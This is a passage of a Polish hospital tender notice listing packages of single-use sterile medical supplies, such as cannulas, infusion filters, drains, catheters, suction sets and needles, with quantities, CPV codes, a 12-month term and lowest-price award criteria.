<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3   Kaniule, filtry i cewniki dla dzieci i noworodków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	       Asortyment	Ilość szt.
1	Kaniula wykonana z politera fluoroetylenu (PTFE) ze zdejmowalnym uchwytem ułatwiającym wprowadzenie kaniuli do naczynia, widoczna w USG,  miękkimi skrzydełkami ułatwiajacymi trzymanie kaniuli, wolna od PCV i lateksu, rozmiar 06 i 07.  	1600
2	Filtr do żywienia neonatologiczny dla wcześniaków i noworodków, maksymalny czas stosowania 24h, wyposażony w zacisk szczelinowy i samoodpowietrzacz, bardzo mały, płaski, łatwy do umocowania, membrana 1,2um , eliminuje cząstki nieorganiczne i grzyby, przepływ 10ml/h, objętość wypełnienia 0,5ml, powierzchnia filtrowania 1,65cm2, nie zawiera lateksu,sterylny	50
3	Filtr infuzyjny neonatologiczny dla wcześniaków i noworodków, maksymalny czas stosowania 96h, wyposażony w zacisk szczelinowy i samoodpowietrzacz, bardzo mały, płaski, łatwy do umocowania, membrana 0,2um , eliminuje cząstki nieorganiczne, bakterie, endotoksyny i grzyby, przepływ 100ml/h, objętość wypełnienia 0,4ml,  powierzchnia filtrowania 1,65cm2, nie zawiera lateksu, sterylny	50
4	Filtr infuzyjny, maksymalny czas stosowania 96h, wyposażony w zacisk szczelinowy, port Y i samoodpowietrzacz, membrana 0,2um,  eliminuje cząstki nieorganiczne, bakterie, endotoksyny i grzyby, przepływ 800ml/h, objętość wypełnienia 2,0 ml,  powierzchnia filtrowania 11,0 cm2, nie zawiera lateksu, sterylizowany radiacyjnie	250
5	Cewnik dopępowinowy jednoświatłowy CH 2,5;  CH 3,5 	3
6	Cewnik dopępowinowy  dwuświatłowy  CH 3,5 	3
1.Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego 
produktu z opisem przedmiotu zamówienia w SIWZ. 

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4   Przyrządy do przetaczań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość szt.
1	Przyrząd do przetaczania płynów infuzyjnych z drenem o dł. min. 150 cm i komorą kroplową o dł. Min. 6 cm, bez łącznika do dodatkowej iniekcji bez igły, j.uż., jałowe, aspirogenne, nietoksyczne, sterylizowane tlenkiem etylenu.	90000
2	Zestaw do szybkiego przetaczania krwi z pompką i filtrem	130
3	Przyrząd do przetaczania krwi z drenem o dł. min. 150 cm i komorą kroplową o dł. min. 9 cm, bez łącznika do dodatkowej iniekcji bez igły, j.uż., jałowe, aspirogenne, nietoksyczne, sterylizowane tlenkiem etylenu.	2400
4	Przyrząd do przetaczania z precyzyjnym regulatorem przepływu w kroplówce, dokładna skala w zakresie 0-250ml/godz. z portem do wstrzykiwań i drenem o dł.226cm	50
5	Przyrząd do przetaczania z możliwością pomiaru OCŻ opakowanie papierowo - foliowe	160
6	Przyrząd do przetaczania leków światłoczułych z zabezpieczeniem na kolec po użyciu zestawów	600
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 								
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5  Przyrządy do żywienia dojelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość szt.
1	Przyrząd do żywienia dojelitowego w wersji do pompy Flocare do butelek - wolny od DEHP	50
2	Przyrząd do żywienia dojelitowego w wersji grawitacyjnej do butelek - wolny od DEHP	100
3	Przyrząd do żywienia dojelitowego w wersji do pompy Flocare do opak. Miękkich - wolny od DEHP	20
4	Przyrząd do żywienia dojelitowego w wersji grawitacyjnej do opak. Miękkich - wolny od DEHP	25
5	Poliuretanowy zgłębnik do żywienia dojelitowego z niebieską linią kontrastującą w promieniach RTG, posiadający prowadnicę Ch 8/130	10
6	Poliuretanowy zgłębnik do żywienia dojelitowego z niebieską linią kontrastującą promieniach RTG, posiadający prowadnicę Ch 10/110	10
7	Poliuretanowy zgłębnik do żywienia dojelitowego z niebieską linią kontrastującą w promieniach RTG, posiadający prowadnicę Ch 12/110	10
8	Zestaw do jejunostomii umożliwiający chirurgiczne założenie zgłębnika służącego do żywienia bezpośrednio do jelita w rozmiarze Ch 8/70 cm	10
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia    w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.                

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6    Sprzęt medyczny jednorazowego użytku sterylny 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	J.m.
1	Dwukomorowy sterylny zestaw do drenażu klatki piersiowej z wydzieloną komorą zastawki wodnej, komorą na wydzielinę o pojemności  3000 ml, komorę. Zestaw musi posiadać: specjalny, zabezpieczony port igłowy, umożliwiający pobieranie świeżo zdrenowanego płynu do badań możliwość podłączenia i współpracy z przenośną próżnią. Budowa kompaktowa o wysokości maksymalnej 25 cm, o stabilnej podstawie, z uchwytem umożliwiającym przenoszenie lub powieszenie. Dren łączący bezlateksowy zabezpieczony przed zagięciem metalową sprężyną z zatyczką. Wszystkie elementy w jednym sterylnym opakowaniu  razem z serwetą.	10	szt
2	Wielokomorowy, sterylny zestaw do drenażu klatki piersiowej posiadający wydzieloną komorę zastawki podwodnej z barwnikiem, komorę na wydzielinę o pojemności min.2200 ml,  wydzieloną wodną komorę regulacji siły ssania z barwnikiem, samouszczelniającym portem igłowym, posiadający automatyczną zastawkę zabezpieczającą przed wysokim dodatnim ciśnieniem oraz mechaniczną zastawkę zabezpieczającą przed wysokim ciśnieniem ujemnym z filtrem. Zestaw z samouszczelniającym portem igłowym do pobierania próbek drenowanego płynu tuż przy drenie łączącym. Możliwość wyciszenia bez ingerencji w system centralnej próżni oraz autoregulacja intensywności bąblowania. Zestaw o budowie kompaktowej, o stabilnej podstawie i wysokości maksymalnej 25cm, z uchwytem umożliwiającym przenoszenie lub powieszenie, z dwoma niezależnymi drenami łączącym bezlateksowymi zabezpieczonymi przed zagięciem metalowymi sprężynami.Wszystkie elementy w jednym sterylnym opakowaniu razem z serwetą	10	szt
3	Dren z trokarem typu trójgraniec, wykonany z termoplastycznego PCV, z linią widoczną w RTG, ze znacznikami głębokości co 2 cm, z oznaczeniem rozmiaru na drenie i płaskim uchwycie trokara, z zabezpieczeniem przed uszkodzeniem opakowania przez trokar, rozm. Ch 28F, 32F  sterylny	30	szt
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.       

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET NR 7   Sprzęt medyczny jednorazowego użytku sterylny 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	J.m.
1	Dren Kehr  wykonany z 100% silikonu Ch12 - Ch20 opakowanie papierowo - foliowe 	7	szt
2	Dren Kehr  wykonany z 100% lateksu Ch12 - Ch20  opakowanie papierowo - foliowe 	100	szt
3	Zestaw do drenażu pooperacyjnego ran, pojemnik mieszek 400ml, dren łączący, zawór samozamykający umożliwiający ponowne wytwarzenie podciśnienia bez rozłączania zestawu, podwójnie pakowany w worek foliowy i zewn. opakowanie foliowo-papierowe	100	szt
4	Zestaw do drenażu pooperacyjnego ran, pojemnik mieszek 400ml, dren łączący, zawór samozamykający umożliwiający ponowne wytwarzenie podciśnienia bez rozłączania zestawu, dren łączący, dren Redona Ch8-18, podwójnie pakowany w worek foliowy i zewn. opakowanie foliowo-papierowe	250	szt
5	Pojemnik mieszek (harmonijka) o poj. 400ml, do długotrwałego odsysania ran z mozliwością połączenia z drenami  	180	szt
6	Dren REDONA Ch10-Ch18 ze znacznikiem RTG dł. min.70 cm	50	szt
7	Dren REDONA Ch10-Ch18 ze znacznikiem RTG dł. min.150 cm	800	szt
8	Ostrza chirurgiczne sterylne rozm.10 -26 , ze stali węglowej, opak. znaczone kolorystycznie w zależności od rozmiaru i kształtu ostrza (nr ostrza i nazwa producenta wygrawerowane bezpośrednio na ostrzu)  a 100szt.	55	op
9	Skalpele sterylne rozm.10-26  - ostrze ze stali nierdzwewnej z wygrawerowanym numerem i z rączką plastikową z nazwą producenta op. a 10 szt	
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.     

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET NR 8  Sprzęt medyczny jednorazowego użytku sterylny 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	J.m.
1	Zestaw do odsysania pola operacyjnego z rączką zakończony kulką, dren z możliwością przycięcia łącznika w specjalnie oznaczonych miejscach i dopasowania do różnego typu ssaków, wzmacniany wzdłużnie, bez kontroli odsysania, długość 300 - 400 cm, podwójnie pakowane	400	szt
2	Zestaw do odsysania pola operacyjnego z rączką zakończony kulką, dren z możliwością przycięcia łącznika w specjalnie oznaczonych miejscach i dopasowania do różnego typu ssaków, wzmacniany wzdłużnie,z kontrolą odsysania, długość 300 - 400 cm, podwójnie pakowane	100	
3	Zestaw do odsysania pola operacyjnego Yankauer  bez kulki , dren z możliwością przycięcia łącznika w specjalnie oznaczonych miejscachi dopasowania do różnego typu ssaków, wzcacniany wzdłużnie, bez kontroli odsysania, długość 300 - 400 cm, podwójnie pakowane	2000	szt
4	Zestaw do odsysania pola operacyjnego Yankauer  bez kulki , dren z możliwością przycięcia łącznika w specjalnie oznaczonych miejscachi dopasowania do różnego typu ssaków, wzcacniany wzdłużnie, z kontrolą odsysania, długość 300 - 400 cm, podwójnie pakowane	600	szt
5	Zestaw do odsysania pola operacyjnego Yankauer bez kontroli odsysania z końcówką standard	50	szt
6	Zestaw do odsysania pola operacyjnego typu OP FLEX SUPER Flow bez kulki, bez kontroli odsysania,  długość min.200cm, podwójnie pakowane	30	szt
7	Dren do ssaka min.300cm	400	szt
8	Końcówka do odsysania pola operacyjnego bez kontroli odsysania,  Ch 22 - 30	200	szt.
9	Końcówka do odsysania pola operacyjnego z kontrolą odsysania, Ch22 - Ch30	100	szt
10	Końcówka do odsysania pola operacyjnego z kulką, bez kontroli odsysania,  Ch 22 - 30	100	szt
11	Dren ULMERA Ch10-Ch18 ze znacznikiem RTG dł. min.70 cm	50	szt.
12	Igła do biopsji tnącej tkanek miękkich z regulowaną długością cięcia  rozm.14G-10cm; 14G-12cm; 14G-20 cm; 18G-10cm: 18G-12cm; 18G-20cm 	10	szt
13	Końcówka do odsysania pola operacyjnego z kulką, z kontrolą odsysania, Ch22 - Ch30	50	szt
14	Dren REDONA  z trokarem stalowym Ch10-Ch18 ze znacznikiem RTG dł. min.150 cm	20	szt.
15	Zestaw do diagnostycznego płukania otrzewnej typu PERITOFIX zawierający: 1) trokar punkcyjny CH 10, z regulowaną głębokością wkłucia, składa się z metalowego mandrynu oraz kaniuli z tworzywa, 2) cewnik CH 9/50cm wykonany z poliuretanu, zamknięty koniec, boczne otwory, 3) kororowe oznaczenie długości, skalpel do nacięcia skóry	50	szt
16	Zestaw do kontrolowanej zbiórki stolca składający się z oznakowanej 45ml strzykawki, miękkiego i ealstycznego rękawa odprowadzająceo zawierającego kolorowy port irygacji, rękaw z jednej strony zakończony miękkim niskociśnieniowym balonikiem, z drugiej zamkniętym workiem zbiorczym. Zestaw posiada sygnalizator wypełnienia balonika, filtr węglowy oraz barwną kieszonkę na palec.	10	szt
17	Worki kompatybilne do zestawu odprowadzającego płynny stolec, op.10szt	3	op.

1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ..    

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET NR 9 Sprzęt medyczny jednorazowego użytku sterylny 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	Ilość	J.m.
1	Cewnik do karmienia dojelitowego Ch6; Ch8; Ch10 z luer - lock  	100	szt
2	Kanka doodbytnicza, z atraumatycznym zakończeniem 	20	szt
3	Cewnik rektalny Ch 18-28	250	szt
4	Worek sterylny do dobowej zbiórki moczu o poj. 2 litrów z zastawką anytzwrotną z odpływem w kształcie litery T z doładną skalą pomiarową co 50 ml.oraz portem do pobierania próbek moczu opakowanie papierowo - foliowe, 	20	szt
5	Worek sterylny do dobowej zbiórki moczu o poj. 2l.z białą tylną ścianką z nadrukowanym polem do opisu danych pacjenta z dokładną skalą pomiarową co 100 ml z uniwersalnymi wieszakami z komorą Pasteura z filtrem hydrofobowym z zastawką antyzwrotną i portem bezigłowym do pobierania próbek	20	szt
6	Zestaw do godzinowej zbiórki moczu sterylny z komorą pomiarową o pojemności 500 ml ze skalą pomiarową co 1ml do min. 40 ml. z workiem o pojemności 2000 ml  z tylną białą ścianką z dokładną skala pomiarową co 100 ml w worku z zastawką antyzwrotną w łączniku z cewnikiem Foley a i worku z filtrem hydrofobowym w worku i komorze oraz odpływem, dren dwukanałowy wyposażony w port bezigłowy do pobierania próbek moczu.	20	szt
7	Zgłębnik żołądkowy bez zatyczki rozm. 16-22, dł. 100 cm, z końcówką atraumatyczną, otworami bocznymi, zakończenie zamknięte i zaokrąglone, posiada znaczniki kontrastujące w RTG, końcówka dalsza zgłębnika pozwala na podłączenie jej do strzykawek, łączników i innych drenów, opakowanie foliowo-papierowe	800	szt
8	Zgłębnik żołądkowy z zatyczką rozm. 14-22, dł. 125 cm, z końcówką atraumatyczną, otworami bocznymi, zakończenie zamknięte i zaokrąglone, posiada znaczniki kontrastujące w RTG, opakowanie foliowo-papierowe	150	szt.
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 10     Sprzęt medyczny jednorazowego użytku  sterylny 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	Ilość	J.m.
1	Sonda nosowo-żółciowa rozm.7F długość 250cm prosta	3	szt
2	Sonda Sengstakena  Ch 21	15	szt
3	Igła do nakłuć lędźwiowych 19G (1,1x88); 20G (0,9x88);  22G (0,77x88);  22G (0,7x40)	300	szt
4	Igła do akupunktury G5 (0,25 x 40mm) a 100szt 	300	op.
5	Igła do aspiracji szpiku 16G x 50mm	20	szt.
6	Igła do aspiracji szpiku 16G x 30mm	10	szt
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.   

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET NR 11 Sprzęt medyczny jednorazowego użytku  sterylny 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	Ilość	J.m.
1	Kuweta Cultera 20ml sterylna	3000	szt
2	Zestaw do krwawego pomiaru ciśnienia krwi kompatybilny z  monitorem funkcji życiowych Infinity Delta 	20	szt
3	Zestaw do drenażu opłucnej z bezpieczną igłą -Veresa z workiem o pojemności 2000 ml. z strzykawką o pojemności 50/60 ml z kranikiem trójdrożnym 	50	szt
4	Zestaw do nakłuć opłucnej  z trzema igłami 14G, 16G, 18G dł. 90mm, worek 2l, zawór jednokierunkowy  	60	szt
5	Zestaw do drenażu opłucnej z zastawką typu Plura-Seal w skład którego wchodzi: poliuretanowy cewnik o rozmiarze 8F/18Ga/19cm, igła z kranikiem trójdrożnym, samozamykająca się zastawka, strzykawka o pojemności 5ml, skalpel. 	3	szt.
6	Zestaw do pobierania wydzielin z drzewa oskrzelowego sterylny opakowanie papierowo - foliowe, próbówka min. 10ml, dodatkowa zakrętka i nalepka identyfikacyjna	400	szt
7	Cewnik do odsysania górnych dróg oddechowych Ch 6-10 dł. 40cm opakowanie papierowo-foliowe	900	szt
8	Cewnik do odsysania górnych dróg oddechowych Ch 12-18 dł. 60cm opakowanie papierowo-foliowe	20000	szt
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET NR 12 Sprzęt medyczny jednorazowego użytku  sterylny 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	J.m.
1	Dren do tlenu 2,1 m	200	szt
2	Dren do tlenu 4 m	500	szt
3	Przedłużacz do pompy infuzyjnej bursztynowy  1,5 m	500	szt
4	Przedłużacz do pompy infuzyjnej 1,5 m	5900	szt.
5	Nożyczki do przecinania zaciskacza jałowe	30	szt
6	Zaciskacz do pępowiny	1400	szt
7	Wziernik j.uż. Cusco S,M,L sterylne	1300	szt.
8	Penseta jednorazowego użytku	150	szt
9	Cewnik do podawania tlenu przez nos dł. drenu min. 200cm 	3000	szt.
10	Szczoteczka do wymazów cytologicznych umożliwiająca pobranie w rozmazie jednocześnie komórek z szyjki macicy, kanału szyjki,  tarczy i strefy transformacji, umożliwaiająca uzyskanie materiału bogatego w komórki endocerwikalne oraz prowadząca do detekcji zwiększonej ilości wirusa onkogennego HPV	600	szt
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 

2. Wymagania dot. poz. 6 - zaciskacz do pępowiny musi być mikrobiologicznie czysty, co należy potwierdzić poprzez dołączenie oświadczenia producenta	
3. Wymagania dot. poz. 10 - Zamawiający wymaga  przedstawienia wykazu badań klinicznych oraz rekomendacji instytucji i towarzystw specjalistycznych dla szczoteczek do wymazów cytologicznych,
4. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET NR 13    Osłona na mikroskop i przewody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	J.m.
1	Osłona na mikroskop typu Zeiss sterylna j.uż. o wym. 200 x 115 cm	200	szt
2	Osłona na przewody sterylna, j.uż. o wym. 200 x 16 cm	700	szt
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET NR 14   Klipsy tytanowe do klipsownicy stalowej, wielorazowej Johnson & Johnson.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	J.m.
1.	Klipsy tytanowe do klipsownicy stalowej, wielorazowej firmy Johnson & Johnson rozmiar ML a 4 szt.	600	szt.
2	Klipsy tytanowe do klipsownicy stalowej, wielorazowej firmy Johnson & Johnson rozmiar L a 4 szt.	160	szt.
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET NR 15   Sprzęt medyczny jednorazowego użytku  sterylny laryngologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	Ilość	J.m.
1	Folia PTFE wykonana z politetrafluoroetulenu, obojętna fizjologicznie nie powodująca odczynów alergicznych i nie zmieniająca swoich właściwości pod wpływem temperatury i środowiska   rozm.60mmx 40mmx 0,2mm i  40mmx40mmx0,2mm	250	szt
2	Przyrząd do drenażu jamy bębenkowej ucha środkowego,kształt zapewniający dobre zamocowanie na błonie bębenkowej z możliwością usuwania  dzięki obecności nitki, wytworzony z politetrafluoroetulenu o barwie białej, nitka wykonanaz przędzy poliamidowej, jałowy, sterylizowany tlenkiem etylenu, pakowany pojedyńczo TYP I średnica 0,9mm	20	szt
3	Przyrząd do drenażu jamy bębenkowej ucha środkowego,kształt zapewniający dobre zamocowanie na błonie bębenkowej z możliwością usuwania  dzięki obecności nitki, wytworzony z politetrafluoroetulenu o barwie białej, nitka wykonanaz przędzy poliamidowej, jałowy, sterylizowany tlenkiem etylenu, pakowany pojedyńczo TYP II średnica 1,15mm	7	szt
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.   

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET NR 16   Przyrządy do przygotowywania leków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość szt
1	Aplikator typu mini spike do pobieraniai przygotowywania leków, zawierający filtr antybakteryjny 0,45um, posiadający nieruchomą osłonę otaczającą nasadkę łączącą ze strzykawką. Samozamykająca się zatyczka portu.  Dołączona zastawka przeciwdziałająca wyciekaniu w pozycji odwróconej. 	500
2	Aplikator typu mini spike do pobierania i przygotowywania leków cytotoksycznych, zawierający filtr antybakteryjny, posiadający nieruchomą osłonę otaczającą nasadkę łączącą ze strzykawką. Samozamykająca się zatyczka portu. Zawierający dodatkowo filtr aerozolowy 0,2um. Dołączona zastawka przeciwdziałająca wyciekaniu w pozycji odwróconej. 	80
3	Krótki kolec przelewowy do przelewania płynu z fiolek i innych opakowań	400
4	Nasadka na butelkę umożliwiająca bezpośrednie przeniesienie leku z fiolki do pojemnika	30
1. Do oferty należy dołączyć: katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.    

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet Nr 17   Zestawy do infuzji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość szt.
1	Bezpieczny zestaw do infuzji grawitacyjnej, zaopatrzony w zastawkę, do zastosowań w systemach zamkniętych. Zawierający : filtr hydrofobowy na końcu drenu i filtr hydrofilny w komorze kroplowej, zabezpieczający przed dostaniem się powietrza do drenu po opróżnieniu kroplówki.nie zawierający DEHP	400
2	Bezpieczny zestaw do infuzji grawitacyjnej do podaży cytostatyków, zaopatrzony w zastawkę, do zastosowań w systemach zamkniętych. Zawierający : filtr hydrofobowy na końcu drenu i filtr hydrofilny w komorze kroplowej, zabezpieczający przed dostaniem się powietrza do drenu po opróżnieniu kroplówki nie zawierający DEHP i PCV	50
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 								
								
